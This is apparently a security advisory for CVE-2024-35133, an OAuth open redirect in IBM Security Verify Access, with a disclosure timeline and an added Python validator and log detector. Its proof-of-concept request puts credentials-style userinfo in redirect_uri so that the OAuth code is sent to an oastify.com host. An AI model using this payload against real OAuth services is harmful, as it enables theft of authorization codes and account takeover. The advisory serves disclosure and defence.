## https://sploitus.com/exploit?id=PACKETSTORM:182287
- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during OAuth Flow
  
======== < Table of Contents >  
================================================  
  
0. Overview  
1. Detailed Description  
2. Proof Of Concept  
3. Solution  
4. Disclosure Timeline  
5. References  
6. Credits  
7. Legal Notices  
  
======== < 0. Overview >  
======================================================  
  
Revision:  
1.0  
  
Impact:  
By persuading a victim to visit a specially crafted Web site, a remote  
attacker could exploit this vulnerability to spoof the URL displayed  
to redirect a user to a malicious Web site that would appear to be  
trusted. This could allow the attacker to obtain highly sensitive  
information or conduct further attacks against the victim.  
  
Severity:  
NIST: High  
IBM: Medium  
  
CVSS Score:  
NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)  
IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)  
  
CVE-ID:  
CVE-2024-35133  
  
Vendor:  
IBM  
  
Affected Products:  
IBM Security Verify Access  
IBM Security Verify Access Docker  
  
Affected Versions:  
10.0.0 - 10.0.8  
  
Product Description:  
  
IBM Security Verify Access is a complete authorization and network  
security policy management solution. It provides end-to-end protection  
of resources over geographically dispersed intranets and extranets.  
  
In addition to state-of-the-art security policy management, IBM Security  
Verify Access provides authentication, authorization, data security, and  
centralized resource management capabilities.  
  
IBM Security Verify Access offers the following features:

Authentication ~ Provides a wide range of built-in authenticators and
supports external authenticators.

Authorization ~ Provides permit and deny decisions for protected resource
requests in the secure domain through the authorization API.

Data security and centralized resource management ~ Manages secure access
to private internal network-based resources by using the public Internet's
broad connectivity and ease of use with a corporate firewall system.
  
======== < 1. Detailed Description >  
==========================================  
  
During a Penetration Test of a client's OAuth flow, an Open Redirect
vulnerability was found that can lead to the leakage of the OAuth "code"
parameter.

It was possible to bypass the parser logic responsible for verifying the
correctness and validity of the "redirect_uri" parameter during an OAuth
flow by leveraging RFC 3986 section 3.2.1 (the userinfo component), i.e. by
providing a username and password directly in the Uniform Resource
Identifier (URI).

By supplying a legitimate and expected domain as the "username" field, it
was possible to bypass the whitelist filter used by "IBM Security Verify
Access" and cause an Open Redirect to any arbitrary domain controlled by the
attacker, altering the expected flow and redirecting the user to a malicious
Web site that would appear to be trusted: the browser ignores the userinfo
part and connects to the host that follows the "@".

This could allow the attacker to obtain highly sensitive information such as
the OAuth "code" token or conduct further attacks against the victim.
  
======== < 2. Proof of Concepts >  
=============================================  
  
===== REQUEST =====  
  
[[
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
]]
  
===== RESPONSE =====  
  
[[
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"  
x-frame-options: DENY  
x-content-type-options: nosniff  
cache-control: no-store  
x-xss-protection: 1; mode=block  
x-permitted-cross-domain-policies: none  
cross-origin-resource-policy: same-site  
content-security-policy: frame-ancestors 'none'  
referrer-policy: no-referrer-when-downgrade  
strict-transport-security: max-age=31536000; includeSubDomains  
pragma: no-cache  
Content-Length: 0.  
]]  
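The following is an added example written for this page; it is not code from the advisory, from IBM Security Verify Access, or from the researcher. It shows, with the redirect target from the proof of concept above, why a prefix check on "redirect_uri" is satisfied by an RFC 3986 userinfo component while the browser actually lands on the host after the "@", how a validator that fully parses the URI and requires an exact match against the registered redirect URIs rejects it, and how the same pattern can be flagged in access logs. The allowlist, the naive check, the "/cb" path (the real path is redacted in the advisory) and the log lines are all constructed assumptions.

```python
"""Added example, not code from the advisory or from IBM: how a prefix check on
redirect_uri is fooled by RFC 3986 userinfo, a strict validator that is not,
and a log scan for the same pattern. The allowlist, naive check and log lines
are constructed for illustration."""
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist of registered redirect URIs for a hypothetical client.
ALLOWED_REDIRECTS = {"https://legitimate.domain/callback"}

# Redirect target from the advisory's proof of concept (its path is redacted
# there; "/cb" is a placeholder).
POC_REDIRECT = ("https://legitimate.domain:bypass@"
                "0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/cb")


def naive_is_allowed(redirect_uri: str) -> bool:
    """Constructed weak check: accept any URI starting with an allowed
    scheme://host. "legitimate.domain:bypass@..." passes this prefix test."""
    for allowed in ALLOWED_REDIRECTS:
        a = urlsplit(allowed)
        if redirect_uri.startswith(f"{a.scheme}://{a.hostname}"):
            return True
    return False


def effective_host(redirect_uri: str) -> Optional[str]:
    """Host a browser actually connects to; the userinfo before '@' is
    discarded, so the PoC lands on the oastify.com domain."""
    return urlsplit(redirect_uri).hostname


def strict_is_allowed(redirect_uri: str) -> bool:
    """Parse fully, reject userinfo and fragments, then require an exact
    (scheme, host, port, path) match with a registered URI."""
    try:
        p = urlsplit(redirect_uri)
        port = p.port  # raises ValueError for a non-numeric port
    except ValueError:
        return False
    if "@" in p.netloc:  # userinfo has no place in a redirect_uri
        return False
    if p.scheme != "https" or not p.hostname or p.fragment:
        return False
    candidate = (p.scheme, p.hostname, port, p.path or "/")
    for allowed in ALLOWED_REDIRECTS:
        a = urlsplit(allowed)
        if candidate == (a.scheme, a.hostname, a.port, a.path or "/"):
            return True
    return False


def flag_userinfo_redirects(log_lines: List[str]) -> List[Tuple[int, str, str]]:
    """Detection: return (line number, redirect_uri, effective host) for
    /oauth/oauth20/authorize requests whose redirect_uri carries userinfo."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        if "/oauth/oauth20/authorize?" not in line:
            continue
        query = line.split("?", 1)[1].split(" ", 1)[0]
        for uri in parse_qs(query).get("redirect_uri", []):
            if "@" in urlsplit(uri).netloc:
                hits.append((n, uri, urlsplit(uri).hostname or ""))
    return hits


# Constructed access-log lines (not from the advisory); the second one
# carries the PoC redirect target, percent-encoded as a client would send it.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Mar/2024:16:04:35 +0000] "GET /oauth/oauth20/authorize'
    '?response_type=code&client_id=c1&redirect_uri=https%3A%2F%2Flegitimate.'
    'domain%2Fcallback&scope=openid HTTP/1.1" 302 0',
    '10.0.0.9 - - [19/Mar/2024:16:04:36 +0000] "GET /oauth/oauth20/authorize'
    '?response_type=code&client_id=c1&redirect_uri=https%3A%2F%2Flegitimate.'
    'domain%3Abypass%400lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com%2Fcb'
    '&scope=openid HTTP/1.1" 302 0',
    '10.0.0.9 - - [19/Mar/2024:16:04:37 +0000] "GET /healthz HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    for uri in ("https://legitimate.domain/callback", POC_REDIRECT):
        print(f"{uri}\n  naive={naive_is_allowed(uri)} strict="
              f"{strict_is_allowed(uri)} browser_host={effective_host(uri)}")
    for n, uri, host in flag_userinfo_redirects(SAMPLE_LOG):
        print(f"line {n}: userinfo in redirect_uri, effective host {host}")
```

The strict validator deliberately treats any "@" in the authority as a rejection rather than trying to strip it: an OAuth redirect target never needs credentials, so the presence of userinfo is itself a signal. A non-numeric port (which Python's parser reports as a ValueError) and a fragment are rejected for the same reason, and the exact-match comparison also closes the related prefix-matching gap where "legitimate.domain.attacker.test" would satisfy a startswith test.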
  
======== < 3. Solution >  
======================================================  
  
Refer to IBM Security Bulletin 7166712 for patch, upgrade or  
suggested workaround information.  
  
See "References" for more details.  
  
======== < 4. Disclosure Timeline >  
===========================================  
  
19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio Garzia)
21/03/2024 - Vulnerability shared with the client who commissioned the
Penetration Test on its infrastructure, which relies on IBM SVA
02/04/2024 - Vulnerability shared with IBM
02/04/2024 - Vulnerability taken over by IBM
14/05/2024 - Vulnerability confirmed by IBM
18/07/2024 - Pre-release provided by IBM to the customer to verify the
resolution of the vulnerability
27/08/2024 - Security Bulletin and vulnerability shared by IBM
  
======== < 5. References >  
====================================================  
  
(1) https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133
(2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026  
(3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133  
(4) https://cwe.mitre.org/data/definitions/178.html  
  
======== < 6. Credits >  
=======================================================  
  
This vulnerability was discovered and reported by:  
  
Giulio Garzia 'Ozozuz'  
  
Contacts:  
  
https://www.linkedin.com/in/giuliogarzia/  
https://github.com/Ozozuz  
  
======== < 7. Legal Notices >  
================================================  
  
Copyright (c) 2024 Giulio Garzia "Ozozuz"  
  
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any medium other than electronically,
please email me for permission.
  
Disclaimer: The information in the advisory is believed to be accurate  
at the time of publishing based on currently available information.  
Use of the information constitutes acceptance for use in an AS IS  
condition.  
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on, this information.